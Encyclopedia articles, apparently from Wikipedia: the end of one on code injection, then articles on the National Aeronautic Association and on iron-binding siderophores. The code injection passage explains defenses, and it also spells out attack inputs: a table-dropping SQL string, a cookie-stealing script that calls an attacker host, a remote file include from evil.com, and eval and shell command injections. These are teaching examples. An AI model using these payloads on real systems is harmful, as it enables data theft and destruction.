isolate managed and unmanaged code injections are: Runtime image hash validation, which involves capturing the hash of a partial or complete image of the executable loaded into memory and comparing it with stored and expected hashes. The NX bit: all user data is stored in special memory sections that are marked as non-executable. The processor is made aware that no code exists in that part of memory and refuses to execute anything found there. Using canaries, which are randomly placed values in a stack. At runtime, a canary is checked when a function returns. If a canary has been modified, the program stops execution and exits. This occurs on a failed stack overflow attack. Code Pointer Masking (CPM): after loading a (potentially changed) code pointer into a register, applying a bitmask to the pointer. This effectively restricts the addresses to which the pointer can refer. This is used in the C programming language.
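The following is a minimal sketch of the parameterized-query defense named above, using Python's built-in sqlite3 module; the table, column names, and credentials are hypothetical.

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE UserList (Username TEXT, Password TEXT)")
conn.execute("INSERT INTO UserList VALUES ('alice', 'secret')")

username = "alice"
password = "anything' OR '1'='1"  # a typical injection attempt

# Vulnerable: string concatenation lets the input rewrite the query.
query = ("SELECT Username FROM UserList WHERE Username = '" + username +
         "' AND Password = '" + password + "'")
print(conn.execute(query).fetchall())  # [('alice',)] despite the wrong password

# Safe: placeholders pass the input as data, never as SQL syntax.
query = "SELECT Username FROM UserList WHERE Username = ? AND Password = ?"
print(conn.execute(query, (username, password)).fetchall())  # []

The same placeholder pattern is available in most database APIs, though the placeholder character varies by driver.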
Examples SQL injection An SQL injection takes advantage of SQL syntax to inject malicious commands that can read or modify a database or compromise the meaning of the original query. For example, consider a web page that has two text fields which allow users to enter a username and a password. The code behind the page will generate an SQL query to check the password against the list of user names: SELECT UserList.Username FROM UserList WHERE UserList.Username = 'Username' AND UserList.Password = 'Password' If this query returns any rows, then access is granted. However, if the malicious user enters a valid Username and injects some valid SQL (Password' OR '1'='1) in the Password field, then the resulting query will look like this: SELECT UserList.Username FROM UserList WHERE UserList.Username = 'Username' AND UserList.Password = 'Password' OR '1'='1' In the example above, "Password" is assumed to be blank or some innocuous string. "'1'='1'" will always be true and many rows will be returned, thereby allowing access. The technique may be refined to allow multiple statements to run or even to load up and run external programs. Assume a query with the following format: SELECT User.UserID FROM User WHERE User.UserID = ' " + UserID + " ' AND User.Pwd = ' " + Password + " ' If an adversary has the following for inputs: UserID: ';DROP TABLE User; --' Password: 'OR"=' then the query will be parsed as: SELECT User.UserID FROM User WHERE User.UserID = '';DROP TABLE User; --'AND Pwd = ''OR"=' As a result, the User table is removed from the database. This occurs because the ; symbol signifies the end of one command and the start of a new one, while -- signifies the start of a comment. Cross-site scripting Code injection is the malicious injection or introduction of code into an application. Some web servers have a guestbook script, which accepts small messages from users and typically receives messages such as: Very nice site! However, a malicious person may know of a code injection vulnerability in the guestbook and enter a message such as: Nice site, I think I'll take it. <script>window.location="https://some_attacker/evilcgi/cookie.cgi?steal=" + escape(document.cookie)</script> If another user views the page, then the injected code will be executed. This code can allow the attacker to impersonate another user. However, this same software bug can be accidentally triggered by an unassuming user, which will cause the website to display bad HTML code. HTML and script injection are popular subjects, commonly termed "cross-site scripting" or "XSS". XSS refers to an injection flaw whereby user input to a web script or similar mechanism is placed into the output HTML without being checked for HTML code or scripting. Many of these problems are related to erroneous assumptions about what input data is possible or the effects of special data.
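The output-encoding defense against such a guestbook payload can be sketched with Python's built-in html module; the page fragment is hypothetical.

import html

message = ('<script>window.location="https://some_attacker/evilcgi/'
           'cookie.cgi?steal=" + escape(document.cookie)</script>')

# Unsafe: inserting the message verbatim would make the browser run the script.
unsafe_page = "<p>" + message + "</p>"

# Safe: escaping turns markup characters into inert character references,
# so the message is displayed as text rather than executed.
safe_page = "<p>" + html.escape(message) + "</p>"
print(safe_page)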
Server Side Template Injection Template engines are often used in modern web applications to display dynamic data. However, trusting non-validated user data can frequently lead to critical vulnerabilities such as server-side template injection. While this vulnerability is similar to cross-site scripting, template injection can be leveraged to execute code on the web server rather than in a visitor's browser. It abuses a common workflow of web applications, which often use user inputs and templates to render a web page. The example below shows the concept; here the template {{visitor_name}} is replaced with data during the rendering process: Hello {{visitor_name}} An attacker can use this workflow to inject code into the rendering pipeline by providing a malicious visitor_name. Depending on the implementation of the web application, the attacker could choose to inject {{7*'7'}}, which the renderer could resolve to Hello 7777777. Note that the actual web server has evaluated the malicious code and therefore could be vulnerable to remote code execution. Dynamic evaluation vulnerabilities An eval() injection vulnerability occurs when an attacker can control all or part of an input string that is fed into an eval() function call. $myvar = 'somevalue'; $x = $_GET['arg']; eval('$myvar = ' . $x . ';'); The argument of "eval" will be processed as PHP, so additional commands can be appended. For example, if "arg" is set to "10; system('/bin/echo uh-oh')", additional code is run which executes a program on the server, in this case "/bin/echo". Object injection PHP allows serialization and deserialization of whole objects. If untrusted input is allowed into the deserialization function, it is possible to overwrite existing classes in the program and execute malicious attacks. Such an attack on Joomla was found in 2013. Remote file injection Consider this PHP program (which includes a file specified by request): <?php $color = 'blue'; if (isset($_GET['color'])) $color = $_GET['color']; require($color . '.php'); The example expects a color to be provided, while attackers might provide color=http://evil.com/exploit, causing PHP to load the remote file. Format specifier injection Format string bugs appear most commonly when a programmer wishes to print a string containing user-supplied data. The programmer may mistakenly write printf(buffer) instead of printf("%s", buffer). The first version interprets buffer as a format string and parses any formatting instructions it may contain. The second version simply prints a string to the screen, as the programmer intended. Consider the following short C program that has a local variable char array password which holds a password; the program asks the user for an integer and a string, then echoes out the user-provided string. char user_input[100]; int int_in; char password[10] = "Password1"; printf("Enter an integer\n"); scanf("%d", &int_in); printf("Please enter a string\n"); fgets(user_input, sizeof(user_input), stdin); printf(user_input); // Safe version is: printf("%s", user_input); printf("\n"); return 0; If the user input is filled with a list of format specifiers, such as %s%s%s%s%s%s%s%s, then printf() will start reading from the stack. Eventually, one of the %s format specifiers will access the address of password, which is on the stack, and print Password1 to the screen. Shell injection Shell injection (or command injection) is named after UNIX shells but applies to most systems that allow software to programmatically execute a command line. Here is an example of a vulnerable tcsh script: #!/bin/tcsh # check arg; outputs "it matches" if arg is one if ($1 == 1) echo it matches If the above is stored in the executable file ./check, the shell command ./check " 1 ) evil" will attempt to execute the injected shell command evil instead of comparing the argument with the constant one. Here, the code under attack is the code that is trying to check the parameter, the very code that might have been trying to validate the parameter to defend against an attack. Any function that can be used to compose and run a shell command is a potential vehicle for launching a shell injection attack. Among these are system(), StartProcess(), and System.Diagnostics.Process.Start().
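The distinction between composing a shell string and executing a program directly can be sketched with Python's built-in subprocess module; /bin/echo stands in for any external program, and the malicious argument is hypothetical.

import subprocess

user_input = "hello; rm -rf /tmp/important"  # attacker-supplied argument

# Vulnerable (shown commented out): the string is handed to a shell, so the
# ";" ends the echo command and the attacker's second command would run.
# subprocess.run("/bin/echo " + user_input, shell=True)

# Safer: an argument list bypasses the shell entirely, so user_input is
# passed to the program as a single inert argument.
subprocess.run(["/bin/echo", user_input])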
Client-server systems such as web browser interaction with web servers are potentially vulnerable to shell injection. Consider the following short PHP program that can run on a web server to run an external program called funnytext to replace a word the user sent with some other word. <?php passthru("/bin/funnytext " . $_GET['USER_INPUT']); The passthru function in the above program composes a shell command that is then executed by the web server. Since part of the command it composes is taken from the URL provided by the web browser, this allows the URL to inject malicious shell commands. One can inject code into this program in several ways by exploiting the syntax of various shell features. Some languages offer functions to properly escape or quote strings that are used to construct shell commands: PHP: escapeshellarg() and escapeshellcmd() Python: shlex.quote() However, this still puts the burden on programmers to know about these functions and to remember to use them every time they run shell commands. In addition to using these functions, validating or sanitizing the user input is also recommended. A safer alternative is to use APIs that execute external programs directly rather than through a shell, thus preventing the possibility of shell injection. However, these APIs tend not to support various convenience features of shells and tend to be more cumbersome and verbose than concise shell syntax. See also References External links Tadeusz Pietraszek and Chris Vanden Berghe. "Defending against Injection Attacks through Context-Sensitive String Evaluation (CSSE)" News article "Flux spreads wider—First Trojan horse to make use of code injection to prevent detection from a firewall" The Daily WTF regularly reports real-world instances of susceptibility to code injection in software Types of malware Injection exploits Machine code Articles with example C code
Code injection
[ "Technology" ]
3,504
[ "Computer security exploits", "Injection exploits" ]
1,065,474
https://en.wikipedia.org/wiki/National%20Aeronautic%20Association
The National Aeronautic Association (NAA) is a federally recognized 501(c)(3) organization whose mission is to advance and oversee the advancement of the art, sport, and science of aviation and space flight. The NAA achieves this by fostering opportunities to participate fully in aviation activities and promoting public understanding of the importance of aviation and space flight in the United States. History In the early years of the 20th century, aviation fascinated the public but remained out of reach for most. The people who could engage in the pursuit were among the wealthiest Americans of that time, such as the Vanderbilts, Gliddens, and Dodges, many of whom belonged to the Automobile Club of America. This group first chose to branch out into the fledgling aviation field in 1905, founding the Aero Club of America (ACA). The ACA’s first goal was to promote aviation in any way possible, as both a sport and a commercial endeavor. From its founding until 1922, the ACA grew in vision and scope and counted many successes in building aviation, including issuing all pilot licenses. In that year, a change was needed to accommodate the expanding business of the ACA, and the National Aeronautic Association (NAA) was incorporated as the Aero Club’s successor. The NAA continued the original group’s mission, including issuing all pilot licenses until the Air Commerce Act of 1926. While the Aero Club of America was based in New York City, the NAA is based in the nation's capital, Washington, D.C., where it continues to serve the mission set forth by its founders. The NAA and the Fédération Aéronautique Internationale In 1905, the NAA's predecessor, the Aero Club of America, joined Germany, Spain, Belgium, the United Kingdom, Italy, Switzerland, and France to create an international aviation organization, the Fédération Aéronautique Internationale (FAI), with the goal of fostering aeronautical activities worldwide. FAI is the organization responsible for establishing the rules for record-setting and competition, and also for recognizing international achievements in aeronautics and astronautics. The NAA is the largest member of FAI and is responsible for appointing representatives to 15 major air sport and technical committees of FAI. The NAA also represents U.S. interests in aviation at the FAI’s Annual General Conference. Mission The NAA's mission is to advance and oversee the advancement of the art, sport, and science of aviation and space flight. The NAA achieves this by fostering opportunities to participate fully in aviation activities and promoting public understanding of the importance of aviation and space flight in the United States. The NAA's purpose is to: Drive excellence with recognition, including through contests, awards, and trophies. Sanction and bestow authority to Americans representing the best in international air sports. Promote and foster appreciation for the art of flying and strengthen the aerospace business. Encourage the study, establishment, and deeper understanding of the science of aeronautics in all forms to encourage inventions and improvements in the field and across the industry. Assist in ensuring a sustainable and reliable aviation system. Aviation and aerospace records The NAA has certified aviation and aerospace records in the United States since 1905.
Its records database counts over 8,000 record flights, including those of balloons, airships, airplanes (land planes, seaplanes, amphibians, and very light jets), gliders, helicopters, autogiros, model aircraft, parachutes, human-powered aircraft, spacecraft, tilt-wing/tilt-engine aircraft, hang gliders, paragliders, microlights, space models, and UAVs. In addition, the NAA certifies various records, including altitude, time-to-climb, distance, speed, greatest payload carried, and efficiency. As the U.S. representative to FAI, the NAA is the sole authority for overseeing and certifying all aviation records in the United States. On average, the NAA certifies 150 records each year. The NAA records process is directed by the NAA Contest and Records Board and managed by Arthur W. Greenfield, Senior V.P. of Contest and Records. Contest and record board members Members Rodney M. Skaar, Chair Kristan R. Maynard, Vice-Chair A.W. Greenfield, Secretary Scott A. Neumann Brian G. Utley Ardyth M. Williams Advisory Panel Justin L. Druckemiller David B. Higginbotham Larry E. Steenstry Aviation trophies and awards The NAA acknowledges accomplishments in aviation and aerospace through its trophies and awards. Open nomination awards Frank G. Brewer Trophy Nomination period: May 1 – August 31 The Frank G. Brewer Trophy is awarded annually to an individual, a group of individuals, or an organization for significant contributions of enduring value to aerospace education in the United States. Robert J. Collier Trophy Nomination period: December 1 – January 31 The Robert J. Collier Trophy is awarded annually for the greatest achievement in aeronautics or astronautics in America, with respect to improving the performance, efficiency, or safety of air or space vehicles, the value of which has been thoroughly demonstrated by actual use during the preceding year. Clifford B. Harmon Aeronaut Trophy Nomination period: April 15 – July 15 The Harmon Aeronaut Trophy is awarded for the most outstanding international achievement in the art and/or science of aeronautics (ballooning) for the period of July 1 – June 30 of the previous year. Katharine Wright Memorial Trophy Nomination period: January 1 – March 31 The Katharine Wright Memorial Trophy is awarded to a woman who has contributed to the success of others or made a personal contribution to the advancement of the art, sport, and science of aviation and space flight over an extended period. Wesley L. McDonald Distinguished Statesman & Stateswoman of Aviation Awards Nomination period: May 1 – August 31 The Wesley L. McDonald Distinguished Statesman and Stateswoman of Aviation Awards are given to outstanding Americans who, by their efforts over an extended period of years, have made contributions of significant value to aeronautics, and have reflected credit upon America and themselves. Public Benefit Flying Awards Nomination period: May 1 – August 31 The Public Benefit Flying Awards honor volunteer pilots, other volunteers, and their organizations engaged in flying to help others. Katherine & Marjorie Stinson Trophy Nomination period: September 1 – November 30 The Katherine & Marjorie Stinson Trophy recognizes a living person, male or female, for an outstanding and enduring contribution to the role of women in the field of aviation, aeronautics, space, or related sciences.
Wright Brothers Memorial Trophy Nomination period: April 1 – June 1 The Wright Brothers Memorial Trophy is awarded to a living American for significant public service of enduring value to aviation in the United States. Special nomination awards Clifford W. Henderson Trophy The Clifford W. Henderson Trophy is given annually to a living individual or group whose vision, leadership, or skill has made a significant and lasting contribution to the promotion and advancement of aviation or space activity. A nomination is put forth annually by the President of the NAA, and a vote of the Executive Committee confirms the recipient. Clarence Mackay Trophy The Clarence Mackay Trophy is awarded for the “most meritorious flight of the year” by an Air Force person, persons, or organization. The Trophy is administered by the United States Air Force and the NAA and is presented in conjunction with the Chief of Staff of the Air Force. Bruce Whitman Trophy The Bruce Whitman Trophy is awarded annually to outstanding individuals who have made significant contributions to aviation or aerospace in the United States and who, by working with museums and other institutions, have promoted an appreciation by students and the broader public of the sacrifices and legacy of members of the military service. A nomination is put forth annually by the Chair of the NAA, and a vote of the Executive Committee confirms the recipient. FAI awards Within the United States and its Territories, the NAA has the sole responsibility of administering awards established by the FAI. Gold Air Medal: Awarded to individuals who have contributed greatly to the development of aeronautics by their activities, work, achievements, initiative or devotion to the cause of aviation. Gold Space Medal: Awarded to individuals who have contributed greatly to the development of astronautics by their activities, work, achievements, initiative or devotion to the cause of space. Sabiha Gökçen Medal: Awarded to a woman who performs the most outstanding achievement in any air sport in the previous year. Silver Medal: Awarded to an individual who has occupied high office in FAI or in an aeronautical organization in one of its member countries, and in the discharge of their duties has shown exceptional powers of leadership and influence, to the benefit of the whole international air sport community. Diploma for Outstanding Airmanship: Awarded to a person or a group of persons for a feat of outstanding airmanship in sub-orbital flight during one of the previous two years which resulted in the saving of the life of others and was carried out with that objective. Anyone engaged in a routine search and/or rescue mission shall not be eligible. Paul Tissandier Diploma: Awarded to those who have served the cause of aviation in general and sporting aviation in particular, by their work, initiative, devotion or in other ways. Honorary Group Diploma: Awarded to groups of people (design offices, scientific bodies, aeronautical publications, etc.) that have contributed significantly to the progress of aeronautics and astronautics during the previous year or years. International Aviation Art Contest: Held annually to encourage young people worldwide to demonstrate the importance of aviation through art and to motivate them to become more familiar with and participate in aeronautics, engineering and science.
The United States portion of the contest is sponsored by the National Aeronautic Association (NAA) in partnership with the National Association of State Aviation Officials (NASAO) and supported by Embry-Riddle Aeronautical University (ERAU), the National Coalition for Aviation Education (NCAE), and the Federal Aviation Administration (FAA). Air sports In America, Air Sport Organizations (ASOs) are integral to the NAA’s ability to fulfill its mission. Many ASOs serve as the introduction or gateway to commercial and business aviation. They are also competitive disciplines for many Americans and lifelong hobbies for thousands more. To foster these relationships, the NAA works closely with ASOs to encourage membership and help drive innovation. America’s ASOs constantly change and evolve as new technology and aircraft become available. The many disciplines of flying are represented by a variety of Air Sport Organizations (ASOs), which are the heart and soul of aviation in America. Nearly half a million people belong to ASOs in the United States, representing aerobatics, aeromodelling, ballooning, gliding, hang gliding and paragliding, powered paragliding and paramotor, and parachuting. America's air sport organizations Part of NAA’s mission is to encourage the sport of aviation, and it does so through its relationship with several United States Air Sport Organizations (ASOs). The NAA founded or helped form many ASOs and continues working closely with them all. ASOs are constantly changing as technology and aircraft evolve and as new air sports become available. Aerobatics: International Aerobatic Club Aeromodelling: Academy of Model Aeronautics Ballooning and airships: Balloon Federation of America Gliding: Soaring Society of America Hang gliding and paragliding: United States Hang Gliding and Paragliding Association Parachuting: United States Parachute Association Indoor skydiving Powered paragliding and paramotor flying: United States Powered Paragliding Association NAA leadership The Board of Directors has an intentional blend of representation from throughout the aviation industry. The NAA Board includes government officials, industry leaders, executives of air sport organizations, and representatives of prominent organizations. The NAA Board provides strategic leadership to the NAA’s President and holds responsibility for the content and alteration of the NAA’s By-Laws. Officers Jim Albaugh, Chair Samantha Magill, Vice Chair, NASA Jason Hopkins, Treasurer, Lockheed Martin Elizabeth Matarese, Secretary, FAA (Retired) Ted Ellett, General Counsel, Hogan Lovells Amy Spowart, NAA President and CEO Board of Directors Nicole Alexander, Aero Club of Wichita Jeremy Bayer, The Boeing Company Darby Becker, Aero Club of Washington Joshua Boehm, Spirit AeroSystems Ché Bolden, The Charles F. Bolden Group Pete Bunce, General Aviation Manufacturers Association Matt Byrd, Hillwood Aviation Leda Chong, Gulfstream Aerospace Corporation J. Ray Davis, Rolls-Royce, North America Arthur W. Greenfield, Jr., NAA Contest & Records Director Sierra Grimes, aviation professional Rich Hanson, Academy of Model Aeronautics Lauren Haertlein, Joby Aviation Chris Hart, Hart Solutions, LLC Joan Higginbotham, Joan Higginbotham Ad Astra, LLC Joseph Huber, Cincinnati/Northern Kentucky Int’l Airport Dick Koenig, New England Air Museum Ben Kowalski, Cirrus Aircraft John S.
Langford, Electra.aero Denise Layton, Soaring Society of America Rebecca Lutte, Embry-Riddle Aeronautical University Brad McKeage, Embraer Mary Miller, Signature Aviation Mary Claire Murphy, Textron Aviation Billy Nolen, Archer Aviation Mark Ofsthun, Honda Aircraft Company Martiqua Post, U.S. Air Force Academy Pat Prentiss, The Ninety-Nines, Inc. Skip Ringo, The Ringo Group Yvette Rose, FAA Stacey Rudser, Association for Women in Aviation Maintenance Sami Said, Northrop Grumman Bob Stangarone, Stangarone & Associates Liana Sucar-Hamel, Airbus Americas Brad Thress, FlightSafety International Anthony L. Velocci, Aviation Week & Space Technology Magazine (Retired) James Viola, Helicopter Association International Patty Wagstaff, Patty Wagstaff Aviation Safety, LLC Clyde Woltman, Leonardo Helicopters, U.S.A. Claudia Zapata-Cardone, United Airlines NAA membership The NAA is honored to oversee the advancement of the art, sport, and science of aviation and space flight. Its mission is achieved by fostering opportunities to participate fully in aviation activities and promoting public understanding of the importance of aviation and space flight to the United States. Corporate Members The support of the NAA’s Corporate Members is the cornerstone in achieving its mission of advancing the art, sport, and science of aviation and space flight. Airbus Aviation Partners, Inc. Bombardier Aerospace Boom Supersonic The Boeing Company Cincinnati/Northern Kentucky International Airport Cirrus Aircraft Electra.aero Embraer FlightSafety International Gulfstream Aerospace Honda Aircraft Company Leonardo Helicopters, U.S.A. Lockheed Martin Corporation MedAire Northrop Grumman Corporation Rolls-Royce North America Signature Flight Support Spirit AeroSystems Textron Aviation Air sport members Part of NAA’s mission is to encourage the sport of aviation, and it does so through its relationship with several United States air sports organizations (ASOs). Academy of Model Aeronautics Balloon Federation of America International Aerobatic Club Soaring Society of America United States Hang Gliding and Paragliding Association United States Parachute Association United States Ultralight Association United States Powered Paragliding Association Affiliate Members NAA’s Affiliate Members represent a unique collection of aviation businesses and organizations participating in critical aviation issues, such as aircraft manufacturers’ liability, airline operations, and historic preservation. Affiliating with NAA helps the aviation community by providing a shared forum for many organizations and associations. Aerospace Industries Association Air Line Pilots Association Air Traffic Control Association Aircraft Owners and Pilots Association Airlines for America Airports Council International – North America American Institute of Aeronautics and Astronautics Cargo Airline Association Experimental Aircraft Association General Aviation Manufacturers Association National Air Traffic Controllers Association National Association of State Aviation Officials National Business Aviation Association Radio Technical Commission for Aeronautics Vertical Aviation International Institutional Members NAA's Institutional Members represent institutions such as colleges, universities, museums, and other places of learning. As spaces for learning, development, and research, institutional members support NAA’s mission to promote the importance of aviation to the general public and support the future advancement of aeronautics.
Cosmosphere Kansas Aviation Museum National Aviation Hall of Fame Aero Club members As America's Aero Club, the NAA serves as a unifier for all regional and local aero clubs. Aero Club Members differ from region to region, but almost all consist of aviation professionals and enthusiasts. Each club has a distinct and distinguished history; activities and interests vary, but all support aviation in their communities. Aero Club of Metropolitan Atlanta Aero Club of New England Aero Club of Northern California Aero Club of Southern California Aero Club of Washington Wichita Aeroclub References External links National Aeronautic Association Aviation organizations based in the United States Aeronautics Aviation competitions and awards Fédération Aéronautique Internationale
National Aeronautic Association
[ "Engineering" ]
3,372
[ "Fédération Aéronautique Internationale", "Aeronautics organizations" ]
1,065,475
https://en.wikipedia.org/wiki/Siderophore
Siderophores (Greek: "iron carrier") are small, high-affinity iron-chelating compounds that are secreted by microorganisms such as bacteria and fungi. They help the organism accumulate iron. Although a widening range of siderophore functions is now being appreciated, siderophores are among the strongest (highest-affinity) Fe3+ binding agents known. Phytosiderophores are siderophores produced by plants. Scarcity of soluble iron Despite being one of the most abundant elements in the Earth's crust, iron is not readily bioavailable. In most aerobic environments, such as the soil or sea, iron exists in the ferric (Fe3+) state, which tends to form insoluble rust-like solids. To be effective, nutrients must not only be available, they must be soluble. Microbes release siderophores to scavenge iron from these mineral phases by formation of soluble Fe3+ complexes that can be taken up by active transport mechanisms. Many siderophores are nonribosomal peptides, although several are biosynthesised independently. Siderophores are also important for some pathogenic bacteria for their acquisition of iron. In mammalian hosts, iron is tightly bound to proteins such as hemoglobin, transferrin, lactoferrin and ferritin. The strict homeostasis of iron leads to a free concentration of about 10−24 mol L−1, hence there are great evolutionary pressures put on pathogenic bacteria to obtain this metal. For example, the anthrax pathogen Bacillus anthracis releases two siderophores, bacillibactin and petrobactin, to scavenge ferric ion from iron-containing proteins. While bacillibactin has been shown to bind to the immune system protein siderocalin, petrobactin is assumed to evade the immune system and has been shown to be important for virulence in mice. Siderophores are amongst the strongest known binders of Fe3+, enterobactin being one of the strongest of all. Because of this property, they have attracted interest from medical science in metal chelation therapy, with the siderophore desferrioxamine B gaining widespread use in treatments for iron poisoning and thalassemia. Besides siderophores, some pathogenic bacteria produce hemophores (heme-binding scavenging proteins) or have receptors that bind directly to iron/heme proteins. In eukaryotes, other strategies to enhance iron solubility and uptake are the acidification of the surroundings (e.g. used by plant roots) or the extracellular reduction of Fe3+ into the more soluble Fe2+ ions. Structure Siderophores usually form a stable, hexadentate, octahedral complex preferentially with Fe3+ compared to other naturally occurring abundant metal ions, although if there are fewer than six donor atoms water can also coordinate. The most effective siderophores are those that have three bidentate ligands per molecule, forming a hexadentate complex and causing a smaller entropic change than that caused by chelating a single ferric ion with separate ligands. Fe3+ is a strong Lewis acid, preferring strong Lewis bases such as anionic or neutral oxygen atoms to coordinate with. Microbes usually release the iron from the siderophore by reduction to Fe2+, which has little affinity for these ligands. Siderophores are usually classified by the ligands used to chelate the ferric iron. The major groups of siderophores include the catecholates (phenolates), hydroxamates and carboxylates (e.g. derivatives of citric acid). Citric acid can also act as a siderophore.
The wide variety of siderophores may be due to evolutionary pressures placed on microbes to produce structurally different siderophores which cannot be transported by other microbes' specific active transport systems, or, in the case of pathogens, deactivated by the host organism. Diversity Siderophores produced by various bacteria and fungi fall into several structural classes: hydroxamate siderophores, catecholate siderophores, mixed-ligand siderophores, and amino carboxylate siderophores. A comprehensive list of siderophore structures (over 250) is presented in Appendix 1 of the cited reference. Biological function Bacteria and fungi In response to iron limitation in their environment, genes involved in microbe siderophore production and uptake are derepressed, leading to manufacture of siderophores and the appropriate uptake proteins. In bacteria, Fe2+-dependent repressors bind to DNA upstream of genes involved in siderophore production at high intracellular iron concentrations. At low concentrations, Fe2+ dissociates from the repressor, which in turn dissociates from the DNA, leading to transcription of the genes. In gram-negative and AT-rich gram-positive bacteria, this is usually regulated by the Fur (ferric uptake regulator) repressor, whilst in GC-rich gram-positive bacteria (e.g. Actinomycetota) it is DtxR (diphtheria toxin repressor), so called as the production of the dangerous diphtheria toxin by Corynebacterium diphtheriae is also regulated by this system. This is followed by excretion of the siderophore into the extracellular environment, where the siderophore acts to sequester and solubilize the iron. Siderophores are then recognized by cell-specific receptors on the outer membrane of the cell. In fungi and other eukaryotes, the Fe-siderophore complex may be extracellularly reduced to Fe2+, while in many cases the whole Fe-siderophore complex is actively transported across the cell membrane. In gram-negative bacteria, these are transported into the periplasm via TonB-dependent receptors, and are transferred into the cytoplasm by ABC transporters. Once in the cytoplasm of the cell, the Fe3+-siderophore complex is usually reduced to Fe2+ to release the iron, especially in the case of "weaker" siderophore ligands such as hydroxamates and carboxylates. Siderophore decomposition or other biological mechanisms can also release iron, especially in the case of catecholates such as ferric-enterobactin, whose reduction potential is too low for reducing agents such as flavin adenine dinucleotide, hence enzymatic degradation is needed to release the iron. Plants Although there is sufficient iron in most soils for plant growth, plant iron deficiency is a problem in calcareous soil, due to the low solubility of iron(III) hydroxide. Calcareous soil accounts for 30% of the world's farmland. Under such conditions graminaceous plants (grasses, cereals and rice) secrete phytosiderophores into the soil, a typical example being deoxymugineic acid. Phytosiderophores have a different structure from those of fungal and bacterial siderophores, having two α-aminocarboxylate binding centres together with a single α-hydroxycarboxylate unit. This latter bidentate function provides phytosiderophores with a high selectivity for iron(III). When grown in an iron-deficient soil, roots of graminaceous plants secrete siderophores into the rhizosphere. On scavenging iron(III), the iron–phytosiderophore complex is transported across the cytoplasmic membrane using a proton symport mechanism.
The iron(III) complex is then reduced to iron(II) and the iron is transferred to nicotianamine, which although very similar to the phytosiderophores is selective for iron(II) and is not secreted by the roots. Nicotianamine translocates iron in the phloem to all plant parts. Chelating in Pseudomonas aeruginosa Iron is an important nutrient for the bacterium Pseudomonas aeruginosa; however, iron is not easily accessible in the environment. To overcome this problem, P. aeruginosa produces siderophores to bind and transport iron. But the bacterium that produced the siderophores does not necessarily receive the direct benefit of iron intake. Rather, all members of the cellular population are equally likely to access the iron-siderophore complexes. The production of siderophores also requires the bacterium to expend energy. Thus, siderophore production can be looked at as an altruistic trait because it is beneficial for the local group but costly for the individual. This altruistic dynamic requires every member of the cellular population to contribute equally to siderophore production. At times, however, mutations occur that result in some bacteria producing lower amounts of siderophore. These mutations give an evolutionary advantage because the bacterium can benefit from siderophore production without suffering the energy cost. Thus, more energy can be allocated to growth. Members of the cellular population that can efficiently produce these siderophores are commonly referred to as cooperators; members that produce little to no siderophores are often referred to as cheaters. Research has shown that when cooperators and cheaters are grown together, cooperators have a decrease in fitness while cheaters have an increase in fitness. It is observed that the magnitude of change in fitness increases with increasing iron limitation. With an increase in fitness, the cheaters can outcompete the cooperators; this leads to an overall decrease in fitness of the group, due to lack of sufficient siderophore production. Pyoverdine and siderophore production in Pseudomonas aeruginosa In a recent study, the production of pyoverdine (PVD), a type of siderophore, in the bacterium Pseudomonas aeruginosa has been explored. This study focused on the construction, modeling, and dynamic simulation of PVD biosynthesis, a virulence factor, through a systemic approach. This approach considers that the metabolic pathway of PVD synthesis is regulated by the phenomenon of quorum sensing (QS), a cellular communication system that allows bacteria to coordinate their behavior based on their population density. The study showed that as bacterial growth increases, so does the extracellular concentration of QS signaling molecules, thus emulating the natural behavior of P. aeruginosa PAO1. To carry out this study, a metabolic network model of P. aeruginosa was built based on the iMO1056 model, the genomic annotation of the P. aeruginosa PAO1 strain, and the metabolic pathway of PVD synthesis. This model included the synthesis of PVD, transport reactions, exchange, and QS signaling molecules. The resulting model, called CCBM1146, showed that the QS phenomenon directly influences the metabolism of P. aeruginosa towards the biosynthesis of PVD as a function of the change in QS signal intensity. This work is the first in silico report of an integrative model that comprises the QS gene regulatory network and the metabolic network of P.
aeruginosa, providing a detailed view of how the production of pyoverdine and siderophores in Pseudomonas aeruginosa is influenced by the quorum-sensing phenomenon. Furthermore, intratumor P. aeruginosa may scavenge iron by producing pyoverdine, which indirectly protects tumor cells from ferroptosis ('iron death'), emphasizing the need for ferroptosis inducers (such as thiostrepton) in cancer treatment. Ecology Siderophores become important in the ecological niche defined by low iron availability, iron being one of the critical growth-limiting factors for virtually all aerobic microorganisms. There are four major ecological habitats: soil and surface water, marine water, plant tissue (pathogens) and animal tissue (pathogens). Soil and surface water The soil is a rich source of bacterial and fungal genera. Common Gram-positive species are those belonging to the Actinomycetales and species of the genera Bacillus, Arthrobacter and Nocardia. Many of these organisms produce and secrete ferrioxamines, which lead to growth promotion of not only the producing organisms, but also other microbial populations that are able to utilize exogenous siderophores. Soil fungi, including Aspergillus and Penicillium, predominantly produce ferrichromes. This group of siderophores consists of cyclic hexapeptides and consequently is highly resistant to the environmental degradation associated with the wide range of hydrolytic enzymes that are present in humic soil. Soils containing decaying plant material possess pH values as low as 3–4. Under such conditions organisms that produce hydroxamate siderophores have an advantage due to the extreme acid stability of these molecules. The microbial population of fresh water is similar to that of soil; indeed, many bacteria are washed out from the soil. In addition, fresh-water lakes contain large populations of Pseudomonas, Azomonas, Aeromonas and Alcaligenes species. As siderophores are secreted into the surroundings, they can be detected by bacterivorous predators, including Caenorhabditis elegans, resulting in nematode migration toward the bacterial prey. Marine water In contrast to most fresh-water sources, iron levels in surface sea-water are extremely low (1 nM to 1 μM in the upper 200 m) and much lower than those of V, Cr, Co, Ni, Cu and Zn. Virtually all this iron is in the iron(III) state and complexed to organic ligands. These low levels of iron limit the primary production of phytoplankton and have led to the Iron Hypothesis, which proposed that an influx of iron would promote phytoplankton growth and thereby reduce atmospheric CO2. This hypothesis has been tested on more than 10 different occasions and in all cases massive blooms resulted. However, the blooms persisted for variable periods of time. An interesting observation made in some of these studies was that the concentration of the organic ligands increased over a short time span to match the concentration of added iron, implying a biological origin and, in view of their affinity for iron, possibly a siderophore or siderophore-like nature. Significantly, heterotrophic bacteria were also found to markedly increase in number in the iron-induced blooms. Thus there is an element of synergism between phytoplankton and heterotrophic bacteria. Phytoplankton require iron (provided by bacterial siderophores), and heterotrophic bacteria require non-CO2 carbon sources (provided by phytoplankton).
